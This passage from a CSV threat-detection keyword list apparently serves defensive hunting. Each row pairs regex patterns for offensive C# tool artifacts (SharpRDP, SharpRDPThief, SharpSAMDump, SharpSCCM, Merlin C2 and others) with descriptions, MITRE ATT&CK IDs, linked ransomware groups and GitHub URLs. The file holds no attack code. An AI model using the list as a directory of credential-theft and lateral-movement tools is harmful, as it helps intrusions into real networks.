Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","18620" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18621" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18622" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18623" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18624" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","18625" "*\SharpMove.sln*",".{0,1000}\\SharpMove\.sln.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","18626" 
"*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18627" "*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18628" "*\SharpNBTScan.sln*",".{0,1000}\\SharpNBTScan\.sln.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","18629" "*\SharpNBTScan-main*",".{0,1000}\\SharpNBTScan\-main.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. 
Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","18630" "*\SharpNetCheck.exe*",".{0,1000}\\SharpNetCheck\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18631" "*\SharpNoPSExec*",".{0,1000}\\SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","18632" "*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18633" "*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18634" "*\SharpOXID-Find.exe*",".{0,1000}\\SharpOXID\-Find\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18635" "*\SharpPack-master*",".{0,1000}\\SharpPack\-master.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18636" 
"*\SharpPersistSD.cs*",".{0,1000}\\SharpPersistSD\.cs.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18637" "*\SharpPersistSD.dll*",".{0,1000}\\SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18638" "*\SharpPersistSD.sln*",".{0,1000}\\SharpPersistSD\.sln.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","18639" "*\sharppick.exe*",".{0,1000}\\sharppick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","18640" "*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - 
T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18641" "*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18642" "*\sharprdp.exe*",".{0,1000}\\sharprdp\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","18643" "*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18644" 
"*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18645" "*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18646" "*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18647" 
"*\SharpRDP.pdb*",".{0,1000}\\SharpRDP\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18648" "*\SharpRDP.pdb*",".{0,1000}\\SharpRDP\.pdb.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18649" "*\SharpRDP\*",".{0,1000}\\SharpRDP\\.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","18650" "*\SharpRDPHijack*",".{0,1000}\\SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral 
Movement","https://github.com/bohops/SharpRDPHijack","1","0","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","18651" "*\SharpRDPThief\*",".{0,1000}\\SharpRDPThief\\.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","18652" "*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18653" "*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18654" "*\SharpRoast.exe*",".{0,1000}\\SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18655" "*\SharpRoast.json*",".{0,1000}\\SharpRoast\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18656" "*\SharpRODC.*",".{0,1000}\\SharpRODC\..{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","18657" "*\SharpRODC\*",".{0,1000}\\SharpRODC\\.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of 
read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","18658" "*\SharpSAMDump-main*",".{0,1000}\\SharpSAMDump\-main.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","18659" "*\SharpSC.exe*",".{0,1000}\\SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","18660" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18661" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18662" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18663" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18664" "*\SharpSCCM-main*",".{0,1000}\\SharpSCCM\-main.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","18665" "*\SharpSC-main*",".{0,1000}\\SharpSC\-main.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","18666" "*\SharpSCshell.exe*",".{0,1000}\\SharpSCshell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18667" "*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18668" 
"*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18669" "*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18670" "*\SharpSecDump.exe*",".{0,1000}\\SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
